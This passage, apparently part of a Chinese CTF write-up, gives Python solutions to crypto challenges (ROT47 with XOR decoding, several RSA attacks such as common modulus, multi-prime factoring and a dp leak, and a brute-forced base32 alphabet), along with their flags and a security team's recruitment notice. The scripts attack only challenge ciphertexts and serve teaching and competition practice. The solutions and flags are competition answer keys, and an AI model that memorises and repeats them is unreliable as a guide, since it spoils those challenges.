            result += chr((ord(c) - 33 + 47) % 94 + 33)
        else:
            result += c
    return result

num_str = '050f000a7e407151537802540b747176075178027552756d0256726262627c'
num_list = [int(num_str[i:i+2], 16) for i in range(0, len(num_str), 2)] # 将十六进制字符串转换为整数列表
xor_num = 50 # 异或的数值

result_list = [n ^ xor_num for n in num_list] # 对列表中每一个元素进行异或操作
result_str = ''.join([chr(n) for n in result_list]) # 将 ASCII 码转换为对应字符

decrypted_str = rot47(result_str) # 使用 ROT47 解密
print(decrypted_str)
# flag{Cr42y_7hursd4y_v1v0_5o!!!}

[WEEK1]what is m

RSA的转码基础

from Crypto.Util.number import *
import libnum
import gmpy2
m = 7130439814057451283002229060880745915743212367553316633039885127247454927505647160409797437959928750181505482768571735220283256353309876617079765282458332035915105679413106241223170191475581
print(long_to_bytes(m))
# flag{TheR3_ARE_sEvERal_4lTeRna7iVE5_To_ThE_IOn9_T0_8y7es_1UNCTioN_E0D2gI9AoacC}

[WEEK1]really_ez_rsa

基础的RSA

from Crypto.Util.number import *
import libnum
import gmpy2

p = 217873395548207236847876059475581824463
q = 185617189161086060278518214521453878483
c = 6170206647205994850964798055359827998224330552323068751708721001188295410644
e = 65537

n = p * q
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e,phi)
m = pow(c,d,n)
print(long_to_bytes(m))
# flag{Y0ung_meiyou_xiaojj}

[WEEK2]ez_rsa

先使用共模得到后半段flag,随后使用yafu对n进行分解得到一个数组

import gmpy2
import libnum
from Crypto.Util.number import *
from sympy import mod_inverse
c = 28535916699190273475273097091422420145718978597126134891571109006456944397344856577421369324831702083810238921719657496747722337086131545474384253288151783029981352196506749672783866527948391034258269669654392993063423671431837882584570973320095601407578443348352802850496429240170710269529489900871208384711844617081275862971410246759090936379744946527813691945129059991795202769186014306943707223831130752782380563227353615164053563120572722464543812139164048342504963081408349934180883607554389607335607410546630525512019818062185681153477671373000186961748278118124044645584490544698827467815360888525822167
n = 114107341297408283801468814470303963122122556489590451040619457052827864984505912502462030175984161431709841571908269123131659496812467145870607611968843929870716066046232009282431653653484798819370087696248364531531706249180822839879862098012984590503284615395588919199545142177727328844260380842155437987767067800740569616584597507776426572206990858918111272636507821551592564540694671795374831548677720629329358177802890287837056940407030212276399942462042866947423728888561392653713356355778914658317507319575084393752755452971007289968044006561357799908892371839922838486713582082980752194204224263283004373
n1 = 21235204662158833223664424963408105101885570855652885953922511758363954474947609854216589644512813634294435585894296340005122907229365513346971631594453999584706013889403572150499529308966742992668850443386284277210686717652643585324255759216699733045642544284406720854291604837774882256435503827543483289606177965628162259184958789025311291796067574924595051311298594432767265114154138693108465671184854794167878031822162731921299518989845784744659944947091213703810190708463199067553747177712259911724424547999547534441790125049383068377243727588278432796727885216967953646999183906479537750330738956233695342750567
e1 = 13
c1 = 5640630966585093229374938575158853304507369792931959909038819773057666482368490365383634362421839045569190487785222799103423460816096797210546343809620912249021763787314569982909943181390882015170344954037813745251119237402775124991005154299085147091159741067430623420349690886728161235034687649593258746455165172528681627568611599473627285223154284756417744280966157271904828156564067870877521824545300153084830020169048653830385763172792698591998191641849931039720453035065355411394516308865955772746815765864888631258825704788352584540380169938419618543124830541663995097651872542381
e2 = 15
c2 = 5481001445755770090420425478456880914921441486935672376394423326451811448703288166341447356603281843336826624725965666634194700496514262129376916108926167953996689011980280761368893884042609095616407660087448963015169181749124738976578495911295096014725354350167650232970262765851074146687931181216305972147994236689422572940877763047930111954798962097847426932730342258169023809341164876019161104439561164839132092594444017039073155506935768658830659965630065643619399324102814118128802834719820426253836317043818687888302054465994498115387703382090351794495827905499417861507007863378916334790750453883661675063377
e = 65537

s,s1,s2 = gmpy2.gcdext(e1,e2)
m = (pow(c1,s1,n1) * pow(c2,s2,n1) % n1)
m2 = long_to_bytes(m)

factors = [11777892065426651999, 10100522426677320149, 16651625235320957803, 15616762946597906161, 17075632607344331131, 16946507762934111301, 13618885037077024279, 10040612110882504553, 16340211116882594287, 11964584391817142269, 17088379813205887661, 9281508366366115669, 14198042938738648387, 10436802938040427139, 9261040693807289549, 16880270107514803247, 10986943768724409089, 11502613740816749197, 9356350172425710359, 13428970346605599557, 10126802520926958821, 10270880245559150279, 9723861249937499279, 15622487550947237203, 15774106340553595249, 10621161426185076191,11718181938374860349 ,13498192768855092449 ,14147604789494386003 ,12712357180113548549 ,10203735303764112277 ,10635881647150245973]

phi_n = 1
for p in factors:
    phi_n *= (p - 1)

d = mod_inverse(e, phi_n)
m = pow(c, d, n)

m1 = ''
while m > 0:
    m, ascii_val = divmod(m, 256)
    m1 = chr(ascii_val) + m1

m3 = m1 + m2.decode('utf-8')
print(m3)

#flag{05929ec9778ed739d94ee1a77b742714}

[WEEK2]e?

模板一把梭

import gmpy2
import libnum
from Crypto.Util.number import *

p= 70724362259337647663584082414795381346569735601816096923682814277857463878289
q= 114427188167532721707398034034072867253267857672869034942206947096293901917007
e= 1314
c= 4308122681135507736058122041934864039713319497673888928736468819190185301630702240416683093700232966794026900978699666246019059398861283337865339404916304

n = p * q
phi = (p - 1) * (q - 1)
t = gmpy2.gcd(e,phi)
t1 = e // t
dt1 = gmpy2.invert(t1,phi)
mt1 = pow(c,dt1,n)
s,m = gmpy2.iroot(mt1,t)
print(long_to_bytes(s))

#flag{This_e_is_real_or_not}

[WEEK2]factorizing_n

分解n

factordb.com

file

import gmpy2
import libnum
from Crypto.Util.number import *

n = 226515252384227990547287743140613580056836242860947832749754689048997071950972581790210817523352001702907675581567498443649554801433663166425134375454937126656357069687274036935331269594383360450823787099121079436459236734336130768046337169817940540921822023269188752420603975467384377614321048859304185067329741055517464271746238143742661897809442359331215501438861121047081117632626097939097519866099140569819965948998542652908170134545593659233229897003698175558888336706474178958535138595687148003367152624421106553412886263257022809480187410133186189435436294593588009551451899398811758511878324326255293307347560753524372663257044426744744426759970254203341706284024734042826158828749144322843934985927079504722440497388146240627249465363931951790326885478025237643
c = 52409805591744226507807531465616894934028463651864630447934395956954575834603756391651746535033902964658694070544877880970130028487381287088425209448038533705903737694267359561133766799228825599943891152463160326583722749586721691729062524310148743637505134465210906856660867852927837112666513674858029892207902196213784902541173835447263733760225682942461048573387925463479672527491229113710629340960375692432470493054415657845868577650170648157402682163577152288432313996310562452677399267755695644659367792066311336521698894993982901657735586844358679888210537898629281625526455444811591386493005341435516094660429968084363084301878446471676122069724608083578102382181382107225473535696274374370868301830807644939881080301668756603163431000745972823980427048672732291
e = 65537
p = 11776588228599764849559519654482976956833367474471407292255776713760090338489966385328569279135095351660161277221351884258247731394014018172166064062551483

phi = p ** 4 * (p - 1)
d = gmpy2.invert(e,phi)
m = pow(c,d,n)
print(long_to_bytes(m))

#flag{1f95f530f85b940db810fc917607ee22}

[WEEK3]好好好!

dp + base32换表爆破

#求密文
import libnum
from Crypto.Util.number import *
import gmpy2 

e=65537
dp=89183181604123417010894108474901628410408206538085478807758137668201829058797702838603939730356798163745078443656032825128645105954284119126609502005130005399692420386460970318283171848176434285488698019425286328269756591931253074416895028845240978211030365697435579850343911269163064228581083838914477473793
n=17133884272385326910236146208723169235592379139078245324256146697759098524213354087333170410075813764497353656874360657828668202585141557095326829141561993608634568037533128091918704136052835609732443342167341276983343070200953604216445186924411131823487594273213380078485528148801722039459601896275130691200206027353715109606722659553700867073796386669768748305283547862565020499794358571741903375812063001390288166187510171105241363677243530996160649133253643422391688399573703498726489248479978887237752214015456924632092625018668632234215462091314384917176427670194819828555385014264912614752917792278216214856001
c=7297673446200396117470312266735704951424121735299327785232249350567349180167473433806232931862684106388722088953786183522191592452252650217579986150373463901393038386627370305688040315665037164819432754099421229466379901436696822022518438390977543864543590936753547325597766614648063328562516667604171990354928485383191174966274941678597887943784661684719053108281896697098991347034225406718530599672101743303723470910913422462764406680309933367328977341637394665138995676573466380198978810546689819954949832833954061771415463198737542769848298258925680570823701939997224167603657418270886620562332895947413332492672

for i in range(1,e):
    if(dp*e-1)%i==0:
        if n%(((dp*e-1)//i)+1) == 0:
            p = ((dp*e-1)//i)+1
            q = n//p
            phi = (p-1)*(q-1)
            d= gmpy2.invert(e,phi)
            print(long_to_bytes(pow(c,d,n)))

# 7U25DUJJ7USYATEN5SREOFFG5NY57FPS77U5DFPY54JEG3NYKWSYA3YD5CXYTTNW53QS====

————————————————————————————————————————————————————————————————————————————————————————————————————————————

#求码表缺少字符
a = '234567ABCDEFGHIJKLMNOPQRSTUVWXYZ='
b = 'EGKMAPZ3TISLXYHWB4R6CQV'

for i in a:
    if i not in b:
        print(i,end='')

# 257DFJNOU=

————————————————————————————————————————————————————————————————————————————————————————————————————————————

#爆破flag
import base64

str1 = '7U25DUJJ7USYATEN5SREOFFG5NY57FPS77U5DFPY54JEG3NYKWSYA3YD5CXYTTNW53QS===='
flag = ''

a = '257DFJNOU='
for q in a:
    for w in a:
        for e in a:
            for r in a:
                for t in a:
                    for y in a:
                        for i in a:
                            for o in a:
                                for p in a:
                                    b = q + w + e + 'EGK' + r + 'MAPZ' + t + y + '3TISLXYHW' + i + 'B4' + o + 'R' + p + '6CQV'
                                    string2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"
                                    c = str1.translate(str.maketrans(b,string2))
                                    d = base64.b32decode(c)
                                    if b'flag{' in d:
                                        print(d)

#flag{fa48a440-d0ff-0c2a-366243-a46b7e7853}

Blockchain

入门推荐:b站搜Snowy雪殇

[WEEK2]blockchain signin

跟着视频一步步做即可

file

友情提醒

EXP的格式是个人习惯!EXP的格式是个人习惯!EXP的格式是个人习惯!重要事情所三遍QAQ

学习推荐只是个人学习时看的视频和资料,另外也有很多优秀的师傅的博客可以去看看。

pwn week2和3就比较偷懒啦,题目太多了,脑子都快溢出了T^T

星盟安全团队招新

微信公众号搜星盟安全

纳新群号

222328705(一群)

346014666(二群)

904749403(b站公开课群)

欢迎各位师傅入群交流